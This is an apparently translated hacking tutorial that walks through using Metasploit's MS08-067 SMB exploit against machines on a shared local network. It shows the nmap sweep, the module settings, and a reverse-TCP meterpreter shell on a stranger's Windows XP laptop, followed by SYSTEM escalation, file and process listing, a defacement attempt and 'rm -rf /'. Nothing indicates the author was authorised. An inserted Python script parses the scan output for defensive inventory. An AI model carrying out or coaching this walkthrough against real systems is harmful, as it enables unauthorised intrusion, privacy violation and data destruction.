Metasploit is a pentest tool, you could say the pentester's favourite :))
This tool is good for all kinds of system analysis, but it can create a dependency for a newbie like me :)) hahaha, admit it..
A dependency that makes a newbie too lazy to analyse things themselves and rely on this tool over and over.
Maybe this is the price of the convenience of object orientation, or of frameworks.
Still, it can be used as learning material.
This method has probably been written up by plenty of other pentesters already.
OK, straight to it.
This time we will explore a system that has the SMB bug. This bug is present when the user has turned on the sharing service and has not updated their system, or because the copy is pirated; our target is Windows, after all :p.
Run Metasploit.
#msfconsole
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 324 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11606 updated 25 days ago (2011.01.20)
Warning: This copy of the Metasploit Framework was last updated 25 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >
Once you are in, connect to the database, or if the database does not exist yet, create it first.
msf > db_connect
[*] Usage: db_connect <user:pass>@<host:port>/<database>
[*] OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*] db_connect user@metasploit3
[*] db_connect user:pass@192.168.0.2/metasploit3
[*] db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect sqlite3
Then scan the target/network for hosts with port 445, which is SMB's port, SMB's hole; why is this getting so dirty, SERIOUS OK, OK SIR :)).
You can also use Nessus, whichever you prefer.
msf > db_nmap 192.168.1.1/24 -p 445
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-14 21:45 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:E0:4C:A6:FC:AD (Realtek Semiconductor)
Nmap scan report for 192.168.1.10
Host is up (0.0038s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:25:9C:9D:1F:D7 (Cisco-Linksys)
Nmap scan report for 192.168.1.100
Host is up (0.026s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1F:E2:A5:EA:6A (Hon Hai Precision Ind. Co.)
Nmap scan report for 192.168.1.101
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 18:14:56:BD:D7:1C (Unknown)
Nmap scan report for 192.168.1.102
Host is up (0.063s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1F:3A:B9:B3:F0 (Hon Hai Precision Ind.Co.)
Nmap scan report for inj3ct0r (192.168.1.105)
Host is up (0.000076s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 192.168.1.107
Host is up (0.019s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: C4:17:FE:56:2C:B3 (Unknown)
Nmap scan report for 192.168.1.109
Host is up (0.033s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 70:F1:A1:90:E5:51 (Unknown)
Nmap scan report for 192.168.1.110
Host is up (0.021s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 70:F1:A1:17:B0:63 (Unknown)
Nmap scan report for 192.168.1.112
Host is up (0.034s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:00:74:0E:CC (GemTek Technology Co.)
Nmap scan report for 192.168.1.114
Host is up (0.037s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: D8:75:33:6C:D8:08 (Unknown)
Nmap scan report for 192.168.1.115
Host is up (0.020s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:17:C4:09:1F:56 (Quanta Microsystems)
Nmap scan report for 192.168.1.116
Host is up (0.021s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1C:CC:DB:84:1E (Research In Motion Limited)
Nmap scan report for 192.168.1.118
Host is up (0.13s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 70:F1:A1:CC:35:28 (Unknown)
Nmap scan report for 192.168.1.123
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: C4:17:FE:06:C1:65 (Unknown)
Nmap scan report for 192.168.1.124
Host is up (0.13s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:24:21:8B:50:12 (Micro-star Int'l CO.)
Nmap scan report for 192.168.1.132
Host is up (0.088s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:26:C6:23:09:0E (Intel Corporate)
Nmap scan report for 192.168.1.133
Host is up (0.11s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: AC:81:12:04:1B:61 (Unknown)
Nmap done: 256 IP addresses (18 hosts up) scanned in 30.24 seconds
msf >
Right there, the hosts with 445/tcp open are the ones we are looking for, moving on.
Next, use the exploit exploit/windows/smb/ms08_067_netapi
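As an added example (not from the original post), here is a small Python parser that groups the hosts in that db_nmap output by the state of port 445; a defender would use the same script to inventory which hosts expose SMB on the LAN and still need the MS08-067 patch level checked. The sample input is a subset of the scan output shown above, embedded so the script runs offline.

```python
"""Parse Nmap normal-output text from a single-port scan and group hosts by port state.

Added example, not code from the original post. SAMPLE_NMAP_OUTPUT is a subset of the
page's own `db_nmap 192.168.1.1/24 -p 445` output, embedded so this runs offline.
"""
import re
from collections import defaultdict

SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-14 21:45 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:E0:4C:A6:FC:AD (Realtek Semiconductor)
Nmap scan report for 192.168.1.10
Host is up (0.0038s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:25:9C:9D:1F:D7 (Cisco-Linksys)
Nmap scan report for 192.168.1.102
Host is up (0.063s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1F:3A:B9:B3:F0 (Hon Hai Precision Ind.Co.)
Nmap scan report for inj3ct0r (192.168.1.105)
Host is up (0.000076s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 192.168.1.112
Host is up (0.034s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:00:74:0E:CC (GemTek Technology Co.)
Nmap done: 256 IP addresses (18 hosts up) scanned in 30.24 seconds
"""

# Matches both "Nmap scan report for 192.168.1.1" and
# "Nmap scan report for inj3ct0r (192.168.1.105)" (hostname followed by IP in parentheses).
_HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$"
)
# "445/tcp filtered microsoft-ds"; state may also be a combined one such as "open|filtered".
_PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[a-z|]+)\s+(?P<service>\S+)")
# "MAC Address: 00:E0:4C:A6:FC:AD (Realtek Semiconductor)"; the vendor part is optional.
_MAC_RE = re.compile(r"^MAC Address: (?P<mac>[0-9A-Fa-f:]{17})(?: \((?P<vendor>.*)\))?")


def parse_nmap_report(text):
    """Return one dict per host: ip, hostname, mac, vendor and a ports map {"445/tcp": state}."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if m:
            current = {"ip": m.group("ip"), "hostname": m.group("name"),
                       "mac": None, "vendor": None, "ports": {}}
            hosts.append(current)
            continue
        if current is None:
            continue  # header lines before the first host
        m = _PORT_RE.match(line)
        if m:
            current["ports"][f"{m.group('port')}/{m.group('proto')}"] = m.group("state")
            continue
        m = _MAC_RE.match(line)
        if m:
            current["mac"] = m.group("mac")
            current["vendor"] = m.group("vendor")
    return hosts


def hosts_by_state(hosts, port="445/tcp"):
    """Group host IPs by the state Nmap reported for `port` (hosts without that port are skipped)."""
    groups = defaultdict(list)
    for host in hosts:
        state = host["ports"].get(port)
        if state is not None:
            groups[state].append(host["ip"])
    return dict(groups)


if __name__ == "__main__":
    parsed = parse_nmap_report(SAMPLE_NMAP_OUTPUT)
    for state, ips in sorted(hosts_by_state(parsed).items()):
        print(f"{state:>8}: {', '.join(ips)}")
```

The "open" group is the patch-verification list; "filtered" hosts are worth a second look too, since a host firewall hiding 445 says nothing about whether the Server service behind it is patched.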
msf > use exploit/windows/smb/ms08_067_netapi
You can see the details of this exploit with the info command; the exploit works by corrupting the stack.
msf exploit(ms08_067_netapi) > info
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 10471
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm
Brett Moore
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
14 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
15 Windows XP SP2 Chinese - Simplified (NX)
16 Windows XP SP2 Chinese - Traditional (NX)
17 Windows XP SP2 Czech (NX)
18 Windows XP SP2 Danish (NX)
19 Windows XP SP2 German (NX)
20 Windows XP SP2 Greek (NX)
21 Windows XP SP2 Spanish (NX)
22 Windows XP SP2 Finnish (NX)
23 Windows XP SP2 French (NX)
24 Windows XP SP2 Hebrew (NX)
25 Windows XP SP2 Hungarian (NX)
26 Windows XP SP2 Italian (NX)
27 Windows XP SP2 Japanese (NX)
28 Windows XP SP2 Korean (NX)
29 Windows XP SP2 Dutch (NX)
30 Windows XP SP2 Norwegian (NX)
31 Windows XP SP2 Polish (NX)
32 Windows XP SP2 Portuguese - Brazilian (NX)
33 Windows XP SP2 Portuguese (NX)
34 Windows XP SP2 Russian (NX)
35 Windows XP SP2 Swedish (NX)
36 Windows XP SP2 Turkish (NX)
37 Windows XP SP3 Arabic (NX)
38 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
39 Windows XP SP3 Chinese - Simplified (NX)
40 Windows XP SP3 Chinese - Traditional (NX)
41 Windows XP SP3 Czech (NX)
42 Windows XP SP3 Danish (NX)
43 Windows XP SP3 German (NX)
44 Windows XP SP3 Greek (NX)
45 Windows XP SP3 Spanish (NX)
46 Windows XP SP3 Finnish (NX)
47 Windows XP SP3 French (NX)
48 Windows XP SP3 Hebrew (NX)
49 Windows XP SP3 Hungarian (NX)
50 Windows XP SP3 Italian (NX)
51 Windows XP SP3 Japanese (NX)
52 Windows XP SP3 Korean (NX)
53 Windows XP SP3 Dutch (NX)
54 Windows XP SP3 Norwegian (NX)
55 Windows XP SP3 Polish (NX)
56 Windows XP SP3 Portuguese - Brazilian (NX)
57 Windows XP SP3 Portuguese (NX)
58 Windows XP SP3 Russian (NX)
59 Windows XP SP3 Swedish (NX)
60 Windows XP SP3 Turkish (NX)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
NEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)
msf exploit(ms08_067_netapi) >
Next, set the target from the list above, i.e. the nmap scan results, with set RHOST x.x.x.x (the IP).
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.123
RHOST => 192.168.1.123
msf exploit(ms08_067_netapi) >
Then set the payload, LHOST and LPORT; LHOST is the IP address of our own machine.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(ms08_067_netapi) > set LPORT 31337
LPORT => 31337
msf exploit(ms08_067_netapi) >
You can use another kind of payload, for example bind_tcp, etc.
Check your settings once more with the show options command.
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.123 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST 192.168.1.105 yes The listen address
LPORT 31337 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
OK, our preparation is neatly in place; let's launch the exploit by typing exploit.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.105:31337
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] No matching target
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
It turns out our target is not vulnerable to this bug, because the system is Windows 7. We could use another exploit, but I don't want to abandon the exploit that is already running; one thing: "never leave something half done, never give up". Let's try another target.
Let's try the one at x.x.1.118
msf exploit(ms08_067_netapi) > set RHOST 192.168.118
RHOST => 192.168.118
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1.118
RHOST => 192.168.1.1.118
msf exploit(ms08_067_netapi) > exploit
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
Turns out that didn't work either, maybe because the network got disconnected; my connection dropped for a moment. Let's try yet another target.
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.112
RHOST => 192.168.1.112
Run the exploit again.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.105:31337
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.105:31337 -> 192.168.1.112:2424) at Mon Feb 14 22:05:03 +0700 2011
meterpreter > 'BINGGO'
Finally we are inside the target computer; the meterpreter > prompt shows that we are in.
Next, let's have a look around first.
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > pwd
C:\WINDOWS
meterpreter > cd ..
meterpreter > ls -la
[-] stdapi_fs_ls: Operation failed: The system cannot find the path specified.
meterpreter > ls (to see the contents of the disk)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil Fri May 07 19:43:57 +0700 2010 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Fri May 07 19:43:57 +0700 2010 CONFIG.SYS
40777/rwxrwxrwx 0 dir Fri Nov 05 09:25:41 +0700 2010 Documents and Settings
100444/r--r--r-- 0 fil Fri May 07 19:43:57 +0700 2010 IO.SYS
40777/rwxrwxrwx 0 dir Fri May 07 19:51:24 +0700 2010 Intel
100444/r--r--r-- 0 fil Fri May 07 19:43:57 +0700 2010 MSDOS.SYS
40555/r-xr-xr-x 0 dir Sat May 08 11:38:42 +0700 2010 MSOCache
100555/r-xr-xr-x 47564 fil Wed Sep 01 06:00:00 +0700 2004 NTDETECT.COM
100666/rw-rw-rw- 13030 fil Fri Nov 05 21:16:08 +0700 2010 PDOXUSRS.NET
40555/r-xr-xr-x 0 dir Tue Feb 08 15:22:49 +0700 2011 Program Files
40777/rwxrwxrwx 0 dir Fri May 07 19:56:32 +0700 2010 RECYCLER
40777/rwxrwxrwx 0 dir Thu Nov 04 08:15:35 +0700 2010 SWSetup
40777/rwxrwxrwx 0 dir Fri May 07 19:48:06 +0700 2010 System Volume Information
40777/rwxrwxrwx 0 dir Sat Feb 05 23:15:05 +0700 2011 TransTool
40777/rwxrwxrwx 0 dir Tue Feb 08 15:49:30 +0700 2011 WINDOWS
40777/rwxrwxrwx 0 dir Sat May 08 11:22:33 +0700 2010 [Smad-Cage]
100666/rw-rw-rw- 211 fil Sat May 08 11:57:11 +0700 2010 boot.ini
40555/r-xr-xr-x 0 dir Tue Dec 21 12:46:52 +0700 2010 cwsandbox
100444/r--r--r-- 250032 fil Wed Sep 01 06:00:00 +0700 2004 ntldr
100666/rw-rw-rw- 2145386496 fil Mon Feb 14 20:52:46 +0700 2011 pagefile.sys
meterpreter > ipconfig (to see the IP of each adapter)
Bluetooth LAN Access Server Driver - Packet Scheduler Miniport
Hardware MAC: 00:21:86:b2:8d:7e
IP Address : 0.0.0.0
Netmask : 0.0.0.0
Realtek RTL8169/8110 Family Gigabit Ethernet NIC - Packet Scheduler Miniport
Hardware MAC: 00:1e:ec:ec:6b:6a
IP Address : 0.0.0.0
Netmask : 0.0.0.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Broadcom 802.11b/g WLAN - Packet Scheduler Miniport
Hardware MAC: 00:21:00:74:0e:cc
IP Address : 192.168.1.112 <- there's the IP :))
Netmask : 255.255.255.0
meterpreter > route (the computer's routing table)
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.1.1
127.0.0.0 255.0.0.0 127.0.0.1
192.168.1.0 255.255.255.0 192.168.1.112
192.168.1.112 255.255.255.255 127.0.0.1
192.168.1.255 255.255.255.255 192.168.1.112
224.0.0.0 240.0.0.0 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
meterpreter > getsystem
...got system (via technique 1).
meterpreter > get
getdesktop getlwd getpid getprivs getsystem getuid getwd
meterpreter > getuid (the uid, i.e. which user we are running as)
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 1308
meterpreter > ps (list the running programs)
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
848 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
976 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1000 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1044 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1056 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1224 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1268 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1308 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1456 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1520 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1876 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
1992 explorer.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\Explorer.EXE
740 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1404 igfxtray.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxtray.exe
1412 hkcmd.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\hkcmd.exe
1424 igfxpers.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxpers.exe
1552 igfxsrvc.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxsrvc.exe
1592 AvastUI.exe x86 0 COMPAQ-056192EE\compaq C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe
1672 SM?RTP.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Smadav\SM?RTP.exe
1692 PDVDServ.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
1728 realsched.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Common Files\Real\Update_OB\realsched.exe
1812 sttray.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\sttray.exe
1164 IDMan.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Internet Download Manager\IDMan.exe
2016 ctfmon.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\ctfmon.exe
280 btwdins.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
288 BTTray.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
400 RichVideo.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\CyberLink\Shared Files\RichVideo.exe
600 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2156 BTSTAC~1.EXE x86 0 COMPAQ-056192EE\compaq C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
2888 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
3256 IEMonitor.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Internet Download Manager\IEMonitor.exe
1320 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2772 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
3056 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
4032 firefox.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Mozilla Firefox\firefox.exe
3976 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
3048 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
1620 Camfrog Video Chat.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Camfrog\Camfrog Video Chat\Camfrog Video Chat.exe
meterpreter >
OK.
That's it from me, the tutorial ends here; the rest you can explore yourself. I'm going to wander around in.. in this Windows for a while, I like roaming about....
see you, bye bye.. :))
meterpreter > echo " mae a.K.a y3d0wn was here " > 0wn3d
[-] Unknown command: echo.
meterpreter > rm -rf /
Thanks to all.
hacker-newbie.org, devilzc0de.org, tecon-crew.org, PCT, etc.
1337db, ICA, PCA.
special thanks to xnagacode, sidom, jurrank_dankkal, black*shadow, Mr.Hack.
and...and you, yes... youuu.